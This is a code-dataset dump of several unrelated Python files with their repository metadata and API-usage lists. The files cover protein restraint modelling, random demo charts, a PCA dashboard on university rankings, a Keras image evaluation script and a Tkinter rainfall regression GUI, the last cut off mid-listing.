def __or__(self, FuzzyRestraint2):
return FuzzyRestraint(self.m, self, FuzzyRestraint2, self.or_)
def __and__(self, FuzzyRestraint2):
return FuzzyRestraint(self.m, self, FuzzyRestraint2, self.and_)
def __invert__(self):
return FuzzyRestraint(self.m, self, None, self.invert_)
def and_(self, a, b):
c = a + b
return c
def or_(self, a, b):
c = math.exp(-a) + math.exp(-b) - math.exp(-a - b)
return -math.log(c)
def invert_(self, a):
c = 1.0 - math.exp(-a)
return -math.log(c)
def evaluate(self):
if len(self.operations) == 0:
return self.distance()
FuzzyRestraint1, op, FuzzyRestraint2 = self.operations
if FuzzyRestraint2 is not None:
return op(FuzzyRestraint1.evaluate(), FuzzyRestraint2.evaluate())
else:
return op(FuzzyRestraint1.evaluate())
def distance(self):
d1 = IMP.core.XYZ(self.particle_pair[0])
d2 = IMP.core.XYZ(self.particle_pair[1])
d = IMP.core.get_distance(d1, d2)
argvalue = (d-self.theta)/self.slope
return (-math.log(1.0 - (1.0-self.plateau) / (1.0+math.exp(-argvalue)))
+ self.innerslope*d)
def add_to_model(self):
IMP.pmi.tools.add_restraint_to_model(self.m, self)
def unprotected_evaluate(self, da):
return self.evaluate()
def __str__(self):
if len(self.operations) == 0:
return str(self.particle_pair)
FuzzyRestraint1, op, FuzzyRestraint2 = self.operations
if FuzzyRestraint2 is not None:
return str(FuzzyRestraint1) + str(op) + str(FuzzyRestraint2)
else:
return str(FuzzyRestraint1) + str(op)
def do_get_inputs(self):
if len(self.operations) == 0:
return list(self.particle_pair)
FuzzyRestraint1, op, FuzzyRestraint2 = self.operations
if FuzzyRestraint2 is not None:
return list(set(FuzzyRestraint1.do_get_inputs()
+ FuzzyRestraint2.do_get_inputs()))
else:
return list(set(FuzzyRestraint1.do_get_inputs()))
|
salilab/pmi
|
pyext/src/restraints/proteomics.py
|
proteomics.py
|
py
| 23,746 |
python
|
en
|
code
| 12 |
github-code
|
6
|
[
{
"api_name": "IMP.atom.create_connectivity_restraint",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.PairRestraint.get_from",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 62,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.input_adaptor",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 91,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.input_adaptor",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 100,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.CompositeRestraint",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 105,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 127,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.open_file_or_inline_text",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 159,
"usage_type": "attribute"
},
{
"api_name": "IMP.atom.Selection",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 172,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.Symmetric.get_is_setup",
"line_number": 178,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 178,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.Symmetric",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 179,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 184,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 186,
"usage_type": "attribute"
},
{
"api_name": "IMP.atom.Selection",
"line_number": 189,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 189,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 197,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 199,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.CompositeRestraint",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 202,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.CompositeRestraint",
"line_number": 218,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 218,
"usage_type": "attribute"
},
{
"api_name": "IMP.Particle",
"line_number": 239,
"usage_type": "call"
},
{
"api_name": "IMP.Particle",
"line_number": 240,
"usage_type": "call"
},
{
"api_name": "IMP.core.XYZR.setup_particle",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 241,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZR.setup_particle",
"line_number": 242,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 242,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.CompositeRestraint",
"line_number": 243,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 243,
"usage_type": "attribute"
},
{
"api_name": "IMP.algebra.Vector3D",
"line_number": 255,
"usage_type": "call"
},
{
"api_name": "IMP.algebra",
"line_number": 255,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.get_distance",
"line_number": 256,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 256,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.output.plot_xy_data",
"line_number": 258,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 258,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 267,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZR",
"line_number": 309,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 309,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZR",
"line_number": 310,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 310,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.get_distance",
"line_number": 313,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 313,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 328,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.open_file_or_inline_text",
"line_number": 336,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 336,
"usage_type": "attribute"
},
{
"api_name": "IMP.atom.Selection",
"line_number": 350,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 350,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 355,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 357,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 360,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 362,
"usage_type": "attribute"
},
{
"api_name": "IMP.atom.Selection",
"line_number": 365,
"usage_type": "call"
},
{
"api_name": "IMP.atom",
"line_number": 365,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 370,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 372,
"usage_type": "attribute"
},
{
"api_name": "warnings.warn",
"line_number": 375,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 377,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.TruncatedHarmonicUpperBound",
"line_number": 386,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 386,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.SphereDistancePairScore",
"line_number": 390,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 390,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.PairRestraint",
"line_number": 391,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 391,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.TruncatedHarmonicLowerBound",
"line_number": 398,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 398,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.SphereDistancePairScore",
"line_number": 402,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 402,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.PairRestraint",
"line_number": 403,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 403,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 418,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 418,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZ",
"line_number": 453,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 453,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZ",
"line_number": 454,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 454,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.get_distance",
"line_number": 456,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 456,
"usage_type": "attribute"
},
{
"api_name": "IMP.pmi.tools.input_adaptor",
"line_number": 487,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 487,
"usage_type": "attribute"
},
{
"api_name": "IMP.RestraintSet",
"line_number": 494,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 504,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 504,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.PairRestraint.get_from",
"line_number": 512,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 512,
"usage_type": "attribute"
},
{
"api_name": "IMP.Restraint",
"line_number": 527,
"usage_type": "attribute"
},
{
"api_name": "IMP.Restraint.__init__",
"line_number": 544,
"usage_type": "call"
},
{
"api_name": "IMP.Restraint",
"line_number": 544,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 567,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.get_list_of_bipartite_minimum_sphere_distance",
"line_number": 568,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 568,
"usage_type": "attribute"
},
{
"api_name": "scipy.spatial.spatial.distance.squareform",
"line_number": 570,
"usage_type": "call"
},
{
"api_name": "scipy.spatial.spatial",
"line_number": 570,
"usage_type": "attribute"
},
{
"api_name": "scipy.spatial",
"line_number": 570,
"usage_type": "name"
},
{
"api_name": "math.exp",
"line_number": 591,
"usage_type": "call"
},
{
"api_name": "numpy.log",
"line_number": 599,
"usage_type": "call"
},
{
"api_name": "IMP.Restraint",
"line_number": 647,
"usage_type": "attribute"
},
{
"api_name": "IMP.Restraint.__init__",
"line_number": 663,
"usage_type": "call"
},
{
"api_name": "IMP.Restraint",
"line_number": 663,
"usage_type": "attribute"
},
{
"api_name": "sys.float_info",
"line_number": 665,
"usage_type": "attribute"
},
{
"api_name": "math.exp",
"line_number": 690,
"usage_type": "call"
},
{
"api_name": "math.log",
"line_number": 691,
"usage_type": "call"
},
{
"api_name": "math.exp",
"line_number": 694,
"usage_type": "call"
},
{
"api_name": "math.log",
"line_number": 695,
"usage_type": "call"
},
{
"api_name": "IMP.core.XYZ",
"line_number": 708,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 708,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.XYZ",
"line_number": 709,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 709,
"usage_type": "attribute"
},
{
"api_name": "IMP.core.get_distance",
"line_number": 710,
"usage_type": "call"
},
{
"api_name": "IMP.core",
"line_number": 710,
"usage_type": "attribute"
},
{
"api_name": "math.log",
"line_number": 712,
"usage_type": "call"
},
{
"api_name": "math.exp",
"line_number": 712,
"usage_type": "call"
},
{
"api_name": "IMP.pmi.tools.add_restraint_to_model",
"line_number": 716,
"usage_type": "call"
},
{
"api_name": "IMP.pmi",
"line_number": 716,
"usage_type": "attribute"
}
] |
3962586718
|
import sys
import os
import random
import matplotlib.pyplot as plt
from typing import List
BASE_FILENAME="develop"
OUTPUT_TYPE="png"
def create_pie_chart(keywords: List[str], base_filename: str, output_type: str):
data = []
explode = []
biggest_value = 0
biggest_iterator = 0
for i, _ in enumerate(keywords):
random_value = random.randint(10, 100)
data.append(random_value)
explode.append(0)
if random_value >= biggest_value:
biggest_iterator = i
biggest_value = random_value
explode[biggest_iterator] = 0.1
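    # the 0.1 offset above pulls the largest slice slightly out of the pie to
    # emphasise it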
fig1, ax1 = plt.subplots()
ax1.set_xlabel("Distribution of value")
ax1.pie(data, explode=explode, labels=keywords, autopct='%1.1f%%',
shadow=True, startangle=90)
ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
plt.savefig(f"outputs/{base_filename}_pie.{output_type}")
def create_bar_chart(keywords: List[str], base_filename: str, output_type: str):
data = []
for _ in keywords:
data.append(random.randint(5, 40))
plt.xlabel('Option')
plt.ylabel('Annual savings in percent')
plt.bar(keywords, data)
plt.savefig(f"outputs/{base_filename}_bar.{output_type}")
def main():
keywords = []
for i, element in enumerate(sys.argv):
if i == 0:
continue
keywords.append(element)
print(f"Your important {len(keywords)} keywords are: {keywords}")
create_bar_chart(keywords, BASE_FILENAME, OUTPUT_TYPE)
create_pie_chart(keywords, BASE_FILENAME, OUTPUT_TYPE)
print("Your important graphs were created")
if __name__=="__main__":
main()
|
neilschark/bullshitgraphs
|
bullshitgraphs/bullshitgraphs.py
|
bullshitgraphs.py
|
py
| 1,675 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "typing.List",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.bar",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "sys.argv",
"line_number": 50,
"usage_type": "attribute"
}
] |
42440314481
|
import plotly.express as px
import plotly.graph_objs as go
import pandas as pd
from sklearn.decomposition import PCA
import numpy as np
#****************** Retrieving the CSV data ************************#
df = pd.read_csv("https://simplonline-v3-prod.s3.eu-west-3.amazonaws.com/media/file/csv/be67fa74-2c34-419c-9249-050394a7eb3e.csv")
# df2016 = df[df.year == 2016].iloc[:50,:]
# df2016['world_rank'] = df2016['world_rank'].replace(['=39'],'39')
# df2016['world_rank'] = df2016['world_rank'].replace(['=44'],'44')
# df2016['world_rank'] = df2016['world_rank'].replace(['=47'],'47')
# df2016["num_students"] = [str(each).replace(',', '') for each in df2016["num_students"]]
df2016 = df[df.year == 2016].iloc[:58,:] # 8 lines contain "NaN"
df2016
df2016 = df2016.dropna()
df2016.isnull().sum()
print(len(df2016))
df2016
def convertGender (x):
a, b= x.split(':')
c = format(int(a)/int(b), ".2f")
return c
df2016['female_male_ratio'] = df2016['female_male_ratio'].apply(convertGender)
df2016.world_rank = [int(each.replace('=','')) for each in df2016.world_rank]
df2016['international_students'] = df2016['international_students'].str.replace(r'%', r'.0').astype('float') / 100.0
df2016['num_students'] = df2016['num_students'].str.replace(r',', r'.').astype('float')
df2016['income'] = df2016['income'].astype('float')
df2016['international'] = df2016['international'].astype('float')
df2016['total_score'] = df2016['total_score'].astype('float')
df_2016 = df2016.drop(['year', 'university_name','country'], axis=1)
# number of observations
n = df_2016.shape[0]
# number of variables
p = df_2016.shape[1]
# figure1
fig1 = px.scatter(df2016, x="country", y="world_rank", color="country")
fig1.update_layout(clickmode='event+select')
fig1.update_traces(marker_size=20)
# figure2
trace1 = go.Scatter( x = df2016.world_rank,y = df2016.citations,
mode = "lines", name = "citations",marker = dict(color = 'rgba(16, 112, 2, 0.8)'),text = df.university_name)
trace2 = go.Scatter( x = df2016.world_rank,y = df2016.teaching,
mode = "lines+markers",name = "enseignement",marker = dict(color = 'rgba(80, 26, 80, 0.8)'),text = df.university_name)
data = [trace1, trace2]
layout = dict(title = 'Citation et enseignement comparé au classement mondial des 50 meilleures universités en 2016',
xaxis = dict(title = 'Rang Mondial',ticklen = 5,zeroline= False))
fig2 = dict(data = data, layout = layout)
# figure3
fig3 = px.scatter(df2016, x="num_students", y="citations",color="country")
fig3.update_layout(clickmode='event+select')
fig3.update_traces(marker_size=20)
# figure4
fig4 = px.scatter(df2016, x="world_rank", y="citations",color="country")
fig4.update_layout(clickmode='event+select')
fig4.update_traces(marker_size=20)
############### Figures for page 2 ######################
# PCA
#1- FIRST-FIG
df_2016 = df2016.drop(['year', 'university_name','country'], axis=1)
#features = ["sepal_width", "sepal_length", "petal_width", "petal_length"]
features = ['world_rank','teaching','research','citations',]
fig5 = px.scatter_matrix(
df_2016,
dimensions=features,
#color="species"
)
fig5.update_traces(diagonal_visible=False)
# 2- PCA-FIG
pca = PCA(n_components=4)
components = pca.fit_transform(df_2016)
labels = {
str(i): f"PC {i+1} ({var:.1f}%)"
for i, var in enumerate(pca.explained_variance_ratio_ * 100)
}
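# the axis labels carry the percentage of variance explained by each principal component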
fig6 = px.scatter_matrix(
components,
labels=labels,
dimensions=range(4),
)
fig6.update_traces(diagonal_visible=False)
# 3- cumsum pca.explained variance
pca2 = PCA()
pca2.fit(df_2016)
val_prop = ((n-1)/n*pca2.explained_variance_)/100
exp_var_cumul = np.cumsum(pca2.explained_variance_ratio_)
fig7 = px.area(
x=range(1, exp_var_cumul.shape[0] + 1),
y=exp_var_cumul,
labels={"x": "# Components", "y": "cumul_variance"}
)
fig8 = px.area(
x=range(1, val_prop.shape[0] + 1),
y=val_prop,
labels={"x": "# Components", "y": "variance"}
)
|
AbdiNi/Plotly-Dash
|
Dash_Plotly/My_dataset.py
|
My_dataset.py
|
py
| 4,007 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "plotly.express.scatter",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "plotly.graph_objs.Scatter",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "plotly.graph_objs",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "plotly.graph_objs.Scatter",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "plotly.graph_objs",
"line_number": 53,
"usage_type": "name"
},
{
"api_name": "plotly.express.scatter",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "plotly.express.scatter",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "plotly.express.scatter_matrix",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "sklearn.decomposition.PCA",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "plotly.express.scatter_matrix",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 99,
"usage_type": "name"
},
{
"api_name": "sklearn.decomposition.PCA",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "numpy.cumsum",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "plotly.express.area",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 116,
"usage_type": "name"
},
{
"api_name": "plotly.express.area",
"line_number": 122,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 122,
"usage_type": "name"
}
] |
2053821942
|
from config import dogs_and_cats_config as config
from pyimagesearch.preprocessing import ImageToArrayPreprocessor, MeanPreprocessor, CropPreprocessor
from pyimagesearch.io import HDF5DatasetGenerator
from keras.models import load_model
import progressbar
import json
import numpy as np
import cv2
import argparse
import pandas as pd
# construct argument parser and parse the argument
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submit', required=True, help='path to submission file')
args = vars(ap.parse_args())
# load RGB means from json
means = json.loads(open(config.DATASET_MEAN).read())
# initialize image preprocessors
mp, cp, iap = MeanPreprocessor(means['R'], means['G'], means['B']), CropPreprocessor(227, 227), ImageToArrayPreprocessor()
# load model
print('[INFO] loading model...')
model = load_model(config.MODEL_PATH)
# initialize dataset generator
test_gen = HDF5DatasetGenerator(config.PUBLIC_TEST_HDF5, batch_size=64, preprocessors=[mp])
preds = []
# initialize progressbar
widgets = ['Evaluating: ', progressbar.Percentage(), ' ', progressbar.Bar(), ' ', progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=test_gen.num_images//64, widgets=widgets)
# loop over single pass of test data
for i, (images, labels) in enumerate(test_gen.generator(passes=1)):
# loop over individual images
for image in images:
# apply crop preprocessor
crops = cp.preprocess(image)
crops = np.array([iap.preprocess(crop) for crop in crops], dtype='float32')
# predict on the crops
pred = model.predict(crops)
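        # averaging the per-crop predictions (over-sampling) yields one probability vector per image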
preds.append(pred.mean(axis=0))
pbar.update(i)
pbar.finish()
# build the submission dataframe
df = pd.DataFrame({
'id': np.array(range(1, test_gen.num_images+1)),
'label': np.array(preds).argmax(axis=1)
})
df.to_csv(args['submit'])
# close database
test_gen.close()
|
lykhahaha/Mine
|
PractitionerBundle/chapter10-dogs_vs_cats/crop_accuracy_public_test.py
|
crop_accuracy_public_test.py
|
py
| 1,859 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "config.dogs_and_cats_config.DATASET_MEAN",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "config.dogs_and_cats_config",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "pyimagesearch.preprocessing.MeanPreprocessor",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pyimagesearch.preprocessing.CropPreprocessor",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pyimagesearch.preprocessing.ImageToArrayPreprocessor",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "keras.models.load_model",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "config.dogs_and_cats_config.MODEL_PATH",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "config.dogs_and_cats_config",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pyimagesearch.io.HDF5DatasetGenerator",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "config.dogs_and_cats_config.PUBLIC_TEST_HDF5",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "config.dogs_and_cats_config",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "progressbar.Percentage",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "progressbar.Bar",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "progressbar.ETA",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "progressbar.ProgressBar",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 53,
"usage_type": "call"
}
] |
962892446
|
from tkinter import *
from tkinter.messagebox import showinfo
import pandas as pd
import numpy as np
import sklearn as sk
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
# function call
def cal():
data = pd.read_csv("2a.csv")
if (var1.get()=='123'):
showinfo("Invalid input", "please select a state")
df = pd.DataFrame(data,
columns=['SUBDIVISION', 'YEAR', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP',
'OCT', 'NOV', 'DEC'])
data= df.loc[df['SUBDIVISION'] == var1.get()]
x = data['YEAR']
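    # scikit-learn expects a 2-D feature array, hence the reshape to (n_samples, 1) below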
x = x.values.reshape(-1, 1)
# x=x.drop(['Unnamed: 0'],axis=1)
if (var.get()=='123'):
showinfo("Invalid input", "please select a month")
y = data[var.get()]
y = y.values.reshape(-1, 1)
clf = LinearRegression()
clf.fit(x, y)
v = int(Year.get())
    if (v<=0 or v>10000):
showinfo("Invalid input", "please use a valid year")
inp = np.array(v)
inp = inp.reshape(1, -1)
# Print output
showinfo("output",f"The precipitation in inches for the input is:,{clf.predict(inp)}")
# year_index = 100
# year = [i for i in range(v-50,v+50)]
plt.scatter(x, y, color='g',marker= ".")
plt.scatter(v, clf.predict(inp), color='b',label=f"Predicted value {clf.predict(inp)} in {Year.get()}",marker= "*")
v=max(v,2015)
x1=[1901,v]
y1=[clf.predict([[1901]])[0][0],clf.predict([[v]])[0][0]]
plt.plot(x1,y1,color='r',label=f"linear prediction from 1901 to {v} ")
plt.title('Precipitation level')
plt.xlabel('Year')
plt.ylabel(f"Precipitation for {var.get()}")
plt.legend()
# Plot a graph of precipitation levels vs n# of days
plt.show()
#GUI
root=Tk()
root.geometry("600x600")
# root.title("rainfall prediction")
Label(root, text="Enter year and choose any one of these",font="any 15 underline",fg="#f58d25").grid(row=0,column=3,ipady=10)
Label(root, text=" Year =",font="any 13 bold",foreground="#853535").grid(row=1,column=1)
Year=Entry(root,justify=LEFT,bg="#cafad2",font="any 12 bold",fg="red")
Year.grid(row=1,column=2,ipady=5,pady=17,ipadx=15)
var=StringVar()
var.set("123")
Radiobutton(root,text="Jan",variable=var, value="JAN",font="any 12",foreground="blue").grid(row=3,column=2)
Radiobutton(root,text="Feb",variable=var, value="FEB",font="any 12",foreground="blue").grid(row=4,column=2)
Radiobutton(root,text="Mar",variable=var, value="MAR",font="any 12",foreground="blue").grid(row=5,column=2)
Radiobutton(root,text="Apr",variable=var, value="APR",font="any 12",foreground="blue").grid(row=6,column=2)
Radiobutton(root,text="May",variable=var, value="MAY",font="any 12",foreground="blue").grid(row=7,column=2)
Radiobutton(root,text="Jun",variable=var, value="JUN",font="any 12",foreground="blue").grid(row=8,column=2)
obj=['ANDAMAN & NICOBAR ISLANDS', 'ARUNACHAL PRADESH', 'ASSAM & MEGHALAYA', 'NAGA MANI MIZO TRIPURA', 'GANGETIC WEST BENGAL', 'ORISSA', 'JHARKHAND', 'BIHAR', 'EAST UTTAR PRADESH', 'WEST UTTAR PRADESH', 'UTTARAKHAND', 'HARYANA DELHI & CHANDIGARH', 'PUNJAB', 'HIMACHAL PRADESH', 'JAMMU & KASHMIR', 'WEST RAJASTHAN' , 'EAST RAJASTHAN', 'WEST MADHYA PRADESH', 'EAST MADHYA PRADESH', 'GUJARAT REGION', 'SAURASHTRA & KUTCH', 'KONKAN & GOA', 'MADHYA MAHARASHTRA', 'MATATHWADA', 'VIDARBHA', 'CHHATTISGARH', 'COASTAL ANDHRA PRADESH', 'TELANGANA', 'RAYALSEEMA', 'TAMIL NADU', 'COASTAL KARNATAKA', 'NORTH INTERIOR KARNATAKA', 'SOUTH INTERIOR KARNATAKA', 'KERALA', 'LAKSHADWEEP',]
var1=StringVar()
var1.set('ANDAMAN & NICOBAR ISLANDS')
OptionMenu(root,var1,*obj).grid(row=9,column=2)
Label(root, text=" Select -> :)",font="any 13 bold",foreground="#853535").grid(row=9,column=1)
Button(text="Calculate Now", command=cal, activebackground = "yellow",border=5).grid(row=11,column=2,pady=20,ipadx=25)
root.mainloop()
|
Santonu-Naskar/Rainfall-Prediction
|
rainfall/main/main1.py
|
main1.py
|
py
| 3,959 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklearn.linear_model.LinearRegression",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.scatter",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 45,
